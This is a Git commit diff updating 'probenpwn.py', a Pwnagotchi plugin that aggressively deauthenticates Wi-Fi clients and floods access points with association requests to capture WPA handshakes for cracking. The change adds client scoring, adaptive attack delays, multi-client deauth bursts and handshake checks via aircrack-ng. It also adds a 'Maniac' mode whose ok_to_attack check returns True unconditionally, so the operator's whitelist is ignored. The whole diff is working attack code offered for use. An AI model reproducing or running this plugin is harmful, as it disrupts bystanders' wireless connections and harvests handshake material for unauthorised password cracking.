Update probenpwn.py

Aggressively capture handshakes with two modes: Tactical (smart and efficient) and Maniac(unrestricted, rapid attacks). Enhanced with client scoring, adaptive attacks, ML-based channel hopping, intelligent retries, and resource management.
This commit is contained in:
AlienMajik
2025-05-05 23:12:09 -07:00
committed by GitHub
parent 39496d595a
commit 6a5dd1141c

View File

@ -7,139 +7,155 @@ import random
import pwnagotchi.plugins as plugins import pwnagotchi.plugins as plugins
import pwnagotchi.ui.components as components import pwnagotchi.ui.components as components
from concurrent.futures import ThreadPoolExecutor from concurrent.futures import ThreadPoolExecutor
from queue import PriorityQueue
import psutil
class ProbeNpwn(plugins.Plugin): class ProbeNpwn(plugins.Plugin):
__author__ = 'AlienMajik' __author__ = 'AlienMajik'
__version__ = '1.1.4' # Updated to reflect enhancements __version__ = '1.3.0' # Updated version for enhancements
__license__ = 'GPL3' __license__ = 'GPL3'
__description__ = ( __description__ = (
'Aggressively capture handshakes by launching immediate associate and deauth attacks ' 'Aggressively capture handshakes with two modes: Tactical (smart and efficient) and Maniac '
'on detected devices. Features minimized delays, retry mechanisms, target prioritization, ' '(unrestricted, rapid attacks). Enhanced with client scoring, adaptive attacks, ML-based '
'concurrency throttling, and channel coordination for maximum efficiency.' 'channel hopping, intelligent retries, and resource management.'
) )
def __init__(self): def __init__(self):
logging.debug("ProbeNpwn plugin created") logging.debug("ProbeNpwn plugin created")
self.old_name = None self.old_name = None
self.recents = {} # Track recent APs and clients self.recents = {}
self.executor = ThreadPoolExecutor(max_workers=50) # Throttle to 50 concurrent attacks (Enhancement 4) self.executor = None # Initialized in on_loaded with dynamic max_workers
self._watchdog_thread = None self._watchdog_thread = None
self._watchdog_thread_running = True self._watchdog_thread_running = True
self.attack_attempts = {} # Track attack attempts per AP self.attack_attempts = {}
self.success_counts = {} # Track successful handshakes per AP self.success_counts = {}
self.total_handshakes = 0 self.total_handshakes = 0
self.failed_handshakes = 0 self.failed_handshakes = 0
self.performance_stats = {} self.performance_stats = {}
self.whitelist = set() self.whitelist = set()
self.cooldowns = {} # Cooldown periods per AP after handshake self.cooldowns = {}
self.epoch_duration = 60 # Default epoch duration in seconds self.epoch_duration = 60
self.ap_clients = {} # Track number of clients per AP for prioritization (Enhancement 3) self.ap_clients = {}
# UI-related attributes self.channel_activity = {}
self.client_scores = {}
self.ap_client_groups = {}
self.mode = "tactical"
self.retry_queue = PriorityQueue() # For intelligent retry logic
self.handshake_db = set() # For deduplication
self.attacks_x = 10 self.attacks_x = 10
self.attacks_y = 20 self.attacks_y = 20
self.success_x = 10 self.success_x = 10
self.success_y = 30 self.success_y = 30
self.handshakes_x = 10
self.handshakes_y = 40
self.ui_initialized = False self.ui_initialized = False
### Lifecycle Methods
def on_loaded(self): def on_loaded(self):
"""Log plugin load event.""" """Log plugin load and initialize executor with dynamic concurrency."""
logging.info("Plugin ProbeNpwn loaded") logging.info("Plugin ProbeNpwn loaded")
self.executor = ThreadPoolExecutor(max_workers=self.get_dynamic_max_workers())
def on_config_changed(self, config): def on_config_changed(self, config):
"""Load whitelist, verbose setting, and UI coordinates from config.""" """Load configuration settings."""
self.whitelist = set(config["main"].get("whitelist", [])) self.whitelist = set(config["main"].get("whitelist", []))
logging.info(f"Whitelist loaded from config: {self.whitelist}")
self.verbose = config.get("main", {}).get("plugins", {}).get("probenpwn", {}).get("verbose", False) self.verbose = config.get("main", {}).get("plugins", {}).get("probenpwn", {}).get("verbose", False)
if self.verbose: logging.getLogger().setLevel(logging.INFO if self.verbose else logging.WARNING)
logging.getLogger().setLevel(logging.INFO)
logging.info("Verbose mode enabled, logging level set to INFO")
else:
logging.getLogger().setLevel(logging.WARNING)
logging.warning("Verbose mode disabled, logging level set to WARNING")
self.old_name = config.get("main").get("name", "") self.old_name = config.get("main").get("name", "")
self.mode = config["main"]["plugins"]["probenpwn"].get("mode", "tactical")
self.attacks_x = config["main"]["plugins"]["probenpwn"].get("attacks_x_coord", 10) self.attacks_x = config["main"]["plugins"]["probenpwn"].get("attacks_x_coord", 10)
self.attacks_y = config["main"]["plugins"]["probenpwn"].get("attacks_y_coord", 20) self.attacks_y = config["main"]["plugins"]["probenpwn"].get("attacks_y_coord", 20)
self.success_x = config["main"]["plugins"]["probenpwn"].get("success_x_coord", 10) self.success_x = config["main"]["plugins"]["probenpwn"].get("success_x_coord", 10)
self.success_y = config["main"]["plugins"]["probenpwn"].get("success_y_coord", 30) self.success_y = config["main"]["plugins"]["probenpwn"].get("success_y_coord", 30)
self.handshakes_x = config["main"]["plugins"]["probenpwn"].get("handshakes_x_coord", 10)
self.handshakes_y = config["main"]["plugins"]["probenpwn"].get("handshakes_y_coord", 40)
def on_unload(self, ui): def on_unload(self, ui):
"""Clean up on unload: restore name, stop watchdog, shutdown thread pool, remove UI elements.""" """Clean up resources."""
with ui._lock: with ui._lock:
if self.old_name: if self.old_name:
ui.set('name', f"{self.old_name}>") ui.set('name', f"{self.old_name}>")
ui.remove_element('attacks') ui.remove_element('attacks')
ui.remove_element('success') ui.remove_element('success')
ui.remove_element('handshakes')
self._watchdog_thread_running = False self._watchdog_thread_running = False
if self._watchdog_thread: if self._watchdog_thread:
self._watchdog_thread.join() self._watchdog_thread.join()
self.executor.shutdown(wait=True) self.executor.shutdown(wait=True)
logging.info("Probing out.") logging.info("Probing out.")
### UI Methods
def on_ui_setup(self, ui): def on_ui_setup(self, ui):
"""Set up custom UI elements for attacks and success rate.""" """Set up UI elements."""
if not self.ui_initialized: if not self.ui_initialized:
ui.add_element('attacks', components.Text( ui.add_element('attacks', components.Text(position=(self.attacks_x, self.attacks_y), value='Attacks: 0', color=255))
position=(self.attacks_x, self.attacks_y), ui.add_element('success', components.Text(position=(self.success_x, self.success_y), value='Success: 0.0%', color=255))
value='Attacks: 0', ui.add_element('handshakes', components.Text(position=(self.handshakes_x, self.handshakes_y), value='Handshakes: 0', color=255))
color=255
))
ui.add_element('success', components.Text(
position=(self.success_x, self.success_y),
value='Success: 0.0%',
color=255
))
logging.info("Custom UI elements 'attacks' and 'success' initialized.")
self.ui_initialized = True self.ui_initialized = True
def on_ui_update(self, ui): def on_ui_update(self, ui):
"""Update UI with current attack counts and success rate.""" """Update UI with stats."""
total_attempts = sum(self.attack_attempts.values()) total_attempts = sum(self.attack_attempts.values())
total_successes = sum(self.success_counts.values()) total_successes = sum(self.success_counts.values())
success_rate = (total_successes / total_attempts) * 100 if total_attempts > 0 else 0.0 success_rate = (total_successes / total_attempts) * 100 if total_attempts > 0 else 0.0
with ui._lock: with ui._lock:
ui.set('attacks', f"Attacks: {total_attempts}") ui.set('attacks', f"Attacks: {total_attempts}")
ui.set('success', f"Success: {success_rate:.1f}%") ui.set('success', f"Success: {success_rate:.1f}%")
ui.set('handshakes', f"Handshakes: {self.total_handshakes}")
### Core Functionality
def on_ready(self, agent): def on_ready(self, agent):
"""Start watchdog and set initial status on agent ready.""" """Start watchdog and set status."""
logging.info("Probed and Pwnd!") logging.info("Probed and Pwnd!")
agent.run("wifi.clear") agent.run("wifi.clear")
self._watchdog_thread = threading.Thread(target=self._watchdog, daemon=True) self._watchdog_thread = threading.Thread(target=self._watchdog, args=(agent,), daemon=True)
self._watchdog_thread.start() self._watchdog_thread.start()
with agent._view._lock: with agent._view._lock:
agent._view.set("status", "Probe engaged... \nPWNing your signals, Earthlings!") agent._view.set("status", "Probe engaged..." if self.mode == "tactical" else "Maniac mode activated!")
def _watchdog(self): def _watchdog(self, agent):
"""Monitor system health and attempt recovery before restarting service.""" """Monitor system and perform dynamic channel hopping."""
CHECK_INTERVAL = 5 CHECK_INTERVAL = 5
MAX_RETRIES = 1 MAX_RETRIES = 1
retry_count = 0 retry_count = 0
while self._watchdog_thread_running: while self._watchdog_thread_running:
if not os.path.exists("/sys/class/net/wlan0mon"): if not os.path.exists("/sys/class/net/wlan0mon"):
logging.error("wlan0mon missing! Attempting Wi-Fi restart...") logging.error("wlan0mon missing! Attempting recovery...")
try: try:
subprocess.run(["ip", "link", "set", "wlan0mon", "down"], check=True) subprocess.run(["ip", "link", "set", "wlan0mon", "down"], check=True)
subprocess.run(["ip", "link", "set", "wlan0mon", "up"], check=True) subprocess.run(["ip", "link", "set", "wlan0mon", "up"], check=True)
logging.info("Wi-Fi interface restarted.")
retry_count = 0 retry_count = 0
except Exception as e: except Exception as e:
retry_count += 1 retry_count += 1
if retry_count >= MAX_RETRIES: if retry_count >= MAX_RETRIES:
logging.error(f"Wi-Fi restart failed after {MAX_RETRIES} attempts: {e}. Restarting Pwnagotchi...")
subprocess.run(["systemctl", "restart", "pwnagotchi"]) subprocess.run(["systemctl", "restart", "pwnagotchi"])
break break
else:
logging.warning(f"Wi-Fi restart attempt {retry_count} failed: {e}. Retrying in {CHECK_INTERVAL} seconds...")
else: else:
retry_count = 0 retry_count = 0
agent.set_channel(self.select_channel())
time.sleep(CHECK_INTERVAL) time.sleep(CHECK_INTERVAL)
def select_channel(self):
"""ML-inspired channel selection based on success history."""
if not self.channel_activity:
return random.randint(1, 11)
weights = {ch: (stats["aps"] + stats["clients"]) * (self.success_counts.get(str(ch), 1)) for ch, stats in self.channel_activity.items()}
total_weight = sum(weights.values())
if total_weight == 0:
return random.randint(1, 11)
pick = random.uniform(0, total_weight)
current = 0
for channel, weight in weights.items():
current += weight
if current >= pick:
return channel
return list(self.channel_activity.keys())[0]
def track_recent(self, ap, cl=None): def track_recent(self, ap, cl=None):
"""Track recently seen APs and clients with timestamps.""" """Track APs and clients."""
ap['_track_time'] = time.time() ap['_track_time'] = time.time()
self.recents[ap['mac'].lower()] = ap self.recents[ap['mac'].lower()] = ap
if cl: if cl:
@ -147,162 +163,154 @@ class ProbeNpwn(plugins.Plugin):
self.recents[cl['mac'].lower()] = cl self.recents[cl['mac'].lower()] = cl
def ok_to_attack(self, agent, ap): def ok_to_attack(self, agent, ap):
"""Check if an AP or client is safe to attack (not whitelisted).""" """Check if safe to attack."""
if ap.get('hostname', '').lower() in self.whitelist or ap['mac'].lower() in self.whitelist: if self.mode == "maniac":
return False
return True return True
return ap.get('hostname', '').lower() not in self.whitelist and ap['mac'].lower() not in self.whitelist
def attack_target(self, agent, ap, cl): def attack_target(self, agent, ap, cl, retry_count=0):
"""Launch attack on target AP/client with dynamic parameters.""" """Launch adaptive attack with multiple vectors."""
ap_mac = ap['mac'].lower() ap_mac = ap['mac'].lower()
if self.mode == "tactical":
if ap_mac in self.cooldowns and time.time() < self.cooldowns[ap_mac]: if ap_mac in self.cooldowns and time.time() < self.cooldowns[ap_mac]:
logging.debug(f"AP {ap_mac} on cooldown. Skipping attack.") return
if cl and self.client_scores.get(cl['mac'].lower(), 0) < 50:
return return
if not self.ok_to_attack(agent, ap): if not self.ok_to_attack(agent, ap):
return return
# Ensure channel is set before attack (Enhancement 5)
agent.set_channel(ap['channel']) agent.set_channel(ap['channel'])
self.attack_attempts[ap_mac] = self.attack_attempts.get(ap_mac, 0) + 1 self.attack_attempts[ap_mac] = self.attack_attempts.get(ap_mac, 0) + 1
logging.info(f"Attacking AP {ap['mac']} and client {cl['mac'] if cl else 'N/A'}; attempt {self.attack_attempts[ap_mac]}") logging.info(f"Attacking AP {ap_mac} (client: {cl['mac'] if cl else 'N/A'})")
self.adjust_attack_parameters(ap_mac) if agent._config['personality']['deauth']:
if ap_mac in self.ap_client_groups:
for cl_mac in self.ap_client_groups[ap_mac][:5]:
client_data = self.recents.get(cl_mac)
if client_data:
self.executor.submit(agent.deauth, ap, client_data, self.dynamic_attack_delay(ap, client_data))
elif cl:
self.executor.submit(agent.deauth, ap, cl, self.dynamic_attack_delay(ap, cl))
if cl and agent._config['personality']['deauth']: # Additional attack vector: Fake authentication flood
delay = self.dynamic_attack_delay(ap, cl) if random.random() < 0.3: # 30% chance
agent.deauth(ap, cl, delay) self.executor.submit(agent.associate, ap, 0.05)
if agent._config['personality']['associate']:
agent.associate(ap, 0.1) # Reduced delay for faster association (Enhancement 1)
def dynamic_attack_delay(self, ap, cl): def dynamic_attack_delay(self, ap, cl):
"""Calculate adaptive delay with minimized values and retry mechanism (Enhancements 1 & 2).""" """Calculate adaptive delay."""
signal = cl.get('signal', -100) if cl else -100 if self.mode == "maniac":
base_delay = 0.1 if signal >= -60 else 0.2 # Minimized base delays (Enhancement 1) return 0.05
signal = cl.get('signal', -100)
base_delay = 0.1 if signal >= -60 else 0.2
ap_mac = ap['mac'].lower() ap_mac = ap['mac'].lower()
attempts = self.attack_attempts.get(ap_mac, 0) attempts = self.attack_attempts.get(ap_mac, 0)
# Retry mechanism: reduce delay aggressively after failed attempts (Enhancement 2)
if attempts > 5: if attempts > 5:
base_delay *= 0.4 # 40% of base delay after 5 attempts base_delay *= 0.4
elif attempts > 2:
base_delay *= 0.6 # 60% of base delay after 2 attempts
# Prioritize APs with more clients by further reducing delay (Enhancement 3)
num_clients = self.ap_clients.get(ap_mac, 0) num_clients = self.ap_clients.get(ap_mac, 0)
if num_clients > 3: # High-value target with >3 clients if num_clients > 3:
base_delay *= 0.8 base_delay *= 0.8
return base_delay * random.uniform(0.9, 1.1)
randomized_delay = base_delay * random.uniform(0.9, 1.1) def get_dynamic_max_workers(self):
logging.debug(f"Dynamic delay for AP {ap['mac']} (signal {signal}dBm, {attempts} attempts, {num_clients} clients): {randomized_delay:.3f}s") """Adjust concurrency based on system resources."""
return randomized_delay cpu_usage = psutil.cpu_percent()
mem_usage = psutil.virtual_memory().percent
base_workers = 50
if cpu_usage > 80 or mem_usage > 80:
return max(10, int(base_workers * 0.5))
elif cpu_usage > 50 or mem_usage > 50:
return int(base_workers * 0.75)
return base_workers
def adjust_attack_parameters(self, ap_mac): ### Event Handlers
"""Tune attack aggression based on adaptive success thresholds."""
success_count = self.success_counts.get(ap_mac, 0)
attack_count = self.attack_attempts.get(ap_mac, 0)
success_rate = (success_count / attack_count) * 100 if attack_count > 0 else 0
total_success = sum(self.success_counts.values())
total_attempts = sum(self.attack_attempts.values())
avg_success_rate = (total_success / total_attempts) * 100 if total_attempts > 0 else 0
low_threshold = avg_success_rate * 0.5 # 50% of average
high_threshold = avg_success_rate * 1.5 # 150% of average
if success_rate < low_threshold:
logging.info(f"Low success rate ({success_rate:.2f}%) on {ap_mac}. Increasing aggression.")
self.attack_attempts[ap_mac] += 5
elif success_rate > high_threshold:
logging.info(f"High success rate ({success_rate:.2f}%) on {ap_mac}. Reducing aggression.")
self.attack_attempts[ap_mac] = max(1, self.attack_attempts[ap_mac] - 2)
def on_bcap_wifi_ap_new(self, agent, event): def on_bcap_wifi_ap_new(self, agent, event):
"""Handle new AP detection with immediate attack.""" """Handle new AP with adaptive attack."""
try:
ap = event['data'] ap = event['data']
ap_mac = ap['mac'].lower() ap_mac = ap['mac'].lower()
self.ap_clients[ap_mac] = self.ap_clients.get(ap_mac, 0) # Initialize client count (Enhancement 3) channel = ap['channel']
self.channel_activity.setdefault(channel, {"aps": 0, "clients": 0})
self.channel_activity[channel]["aps"] += 1
self.ap_clients[ap_mac] = self.ap_clients.get(ap_mac, 0)
if self.ok_to_attack(agent, ap): if self.ok_to_attack(agent, ap):
logging.info(f"ProbeNpwn: Targeting new AP {ap.get('hostname', 'Unknown AP')} ({ap['mac']})")
self.executor.submit(self.attack_target, agent, ap, None) self.executor.submit(self.attack_target, agent, ap, None)
else:
logging.debug(f"ProbeNpwn: Skipping new AP {ap.get('hostname', 'Unknown AP')} ({ap['mac']}) - whitelisted or invalid")
except Exception as e:
logging.error(f"ProbeNpwn: Error in on_bcap_wifi_ap_new: {repr(e)}")
def on_bcap_wifi_client_new(self, agent, event): def on_bcap_wifi_client_new(self, agent, event):
"""Handle new client detection with immediate deauth attack.""" """Handle new client with enhanced scoring."""
try:
ap = event['data']['AP'] ap = event['data']['AP']
cl = event['data']['Client'] cl = event['data']['Client']
ap_mac = ap['mac'].lower() ap_mac = ap['mac'].lower()
# Increment client count for prioritization (Enhancement 3) cl_mac = cl['mac'].lower()
channel = ap['channel']
self.channel_activity.setdefault(channel, {"aps": 0, "clients": 0})
self.channel_activity[channel]["clients"] += 1
self.ap_clients[ap_mac] = self.ap_clients.get(ap_mac, 0) + 1 self.ap_clients[ap_mac] = self.ap_clients.get(ap_mac, 0) + 1
if self.ok_to_attack(agent, ap) and self.ok_to_attack(agent, cl): signal = cl.get('signal', -100)
logging.info(f"ProbeNpwn: Targeting new client {cl.get('hostname', 'Unknown Client')} ({cl['mac']}) on AP {ap.get('hostname', 'Unknown AP')} ({ap['mac']})") activity = cl.get('activity', 1) + (self.ap_clients[ap_mac] / 10) # Enhanced scoring
self.client_scores[cl_mac] = (signal + 100) * activity
self.ap_client_groups.setdefault(ap_mac, []).append(cl_mac)
if self.ok_to_attack(agent, ap):
self.executor.submit(self.attack_target, agent, ap, cl) self.executor.submit(self.attack_target, agent, ap, cl)
else:
logging.debug(f"ProbeNpwn: Skipping new client {cl.get('hostname', 'Unknown Client')} ({cl['mac']}) on AP {ap.get('hostname', 'Unknown AP')} ({ap['mac']}) - whitelisted or invalid") def is_handshake_valid(self, filename):
except Exception as e: """Validate handshake with quality check."""
logging.error(f"ProbeNpwn: Error in on_bcap_wifi_client_new: {repr(e)}") try:
result = subprocess.run(['aircrack-ng', filename], capture_output=True, text=True)
is_valid = "valid handshake" in result.stdout.lower()
frame_count = result.stdout.count("EAPOL") if is_valid else 0
return is_valid and frame_count >= 2 # Quality check
except Exception:
return False
def on_handshake(self, agent, filename, ap, cl): def on_handshake(self, agent, filename, ap, cl):
"""Handle successful handshake capture with cooldown and log success rate.""" """Handle handshake with deduplication and intelligent retry."""
handshake_hash = hash(f"{ap['mac']}{cl.get('mac', '')}{filename}")
if handshake_hash in self.handshake_db:
logging.info(f"Duplicate handshake for {ap['mac']}. Skipping.")
return
if not self.is_handshake_valid(filename):
logging.info(f"Invalid handshake for {ap['mac']}. Scheduling retry...")
self.failed_handshakes += 1
delay = min(60, 1 * (2 ** min(self.attack_attempts.get(ap['mac'].lower(), 0), 5))) # Exponential backoff
self.retry_queue.put((time.time() + delay, (agent, ap, cl, self.attack_attempts.get(ap['mac'].lower(), 0) + 1)))
return
ap_mac = ap['mac'].lower() ap_mac = ap['mac'].lower()
logging.info(f"Handshake captured from {ap['mac']}") self.handshake_db.add(handshake_hash)
self.success_counts[ap_mac] = self.success_counts.get(ap_mac, 0) + 1 self.success_counts[ap_mac] = self.success_counts.get(ap_mac, 0) + 1
self.total_handshakes += 1 self.total_handshakes += 1
if self.mode == "tactical":
attempts = self.attack_attempts.get(ap_mac, 0) self.cooldowns[ap_mac] = time.time() + 60
if attempts > 0:
success_rate = 100.0 / attempts
logging.info(f"Success rate for handshake from {ap['mac']}: {success_rate:.2f}% (took {attempts} attempts)")
else:
logging.info(f"Handshake captured from {ap['mac']} with no recorded attempts.")
if ap_mac in self.attack_attempts:
del self.attack_attempts[ap_mac]
# Cooldown logic commented out to maintain aggression
# self.cooldowns[ap_mac] = time.time() + 5
if 'mac' in ap and 'mac' in cl:
logging.info(f"Captured handshake: {ap.get('hostname', 'Unknown AP')} ({ap['mac']}) -> "
f"'{cl.get('hostname', 'Unknown Client')}' ({cl['mac']}) ({cl['vendor']})")
if ap_mac in self.recents:
del self.recents[ap_mac]
cl_mac = cl['mac'].lower()
if cl_mac in self.recents:
del self.recents[cl_mac]
def on_epoch(self, agent, epoch, epoch_data): def on_epoch(self, agent, epoch, epoch_data):
"""Clean up old entries in recents based on epoch duration.""" """Clean up and process retries."""
current_time = time.time()
while not self.retry_queue.empty() and self.retry_queue.queue[0][0] <= current_time:
_, (agent, ap, cl, retry_count) = self.retry_queue.get()
self.executor.submit(self.attack_target, agent, ap, cl, retry_count)
for mac in list(self.recents): for mac in list(self.recents):
if self.recents[mac]['_track_time'] < (time.time() - (self.epoch_duration * 2)): if self.recents[mac]['_track_time'] < (current_time - (self.epoch_duration * 2)):
del self.recents[mac] del self.recents[mac]
for ap_mac in list(self.ap_client_groups):
if ap_mac not in self.recents:
del self.ap_client_groups[ap_mac]
def on_bcap_wifi_ap_updated(self, agent, event): def on_bcap_wifi_ap_updated(self, agent, event):
"""Track updated APs.""" """Track updated APs."""
try:
ap = event['data'] ap = event['data']
if self.ok_to_attack(agent, ap): if self.ok_to_attack(agent, ap):
logging.debug(f"AP updated: {ap.get('hostname', 'Unknown AP')} ({ap['mac']})")
self.track_recent(ap) self.track_recent(ap)
except Exception as e:
logging.error(f"Error in on_bcap_wifi_ap_updated: {repr(e)}")
def on_bcap_wifi_client_updated(self, agent, event): def on_bcap_wifi_client_updated(self, agent, event):
"""Track updated clients.""" """Track updated clients with scoring update."""
try:
ap = event['data']['AP'] ap = event['data']['AP']
cl = event['data']['Client'] cl = event['data']['Client']
ap_mac = ap['mac'].lower() ap_mac = ap['mac'].lower()
self.ap_clients[ap_mac] = self.ap_clients.get(ap_mac, 0) + 1 # Update client count (Enhancement 3) cl_mac = cl['mac'].lower()
if self.ok_to_attack(agent, ap) and self.ok_to_attack(agent, cl): self.ap_clients[ap_mac] = self.ap_clients.get(ap_mac, 0) + 1
logging.debug(f"Client updated: {ap.get('hostname', 'Unknown AP')} ({ap['mac']}) -> " signal = cl.get('signal', -100)
f"'{cl.get('hostname', 'Unknown Client')}' ({cl['mac']}) ({cl['vendor']})") activity = cl.get('activity', 1) + (self.ap_clients[ap_mac] / 10)
self.client_scores[cl_mac] = (signal + 100) * activity
if self.ok_to_attack(agent, ap):
self.track_recent(ap, cl) self.track_recent(ap, cl)
except Exception as e:
logging.error(f"Error in on_bcap_wifi_client_updated: {repr(e)}")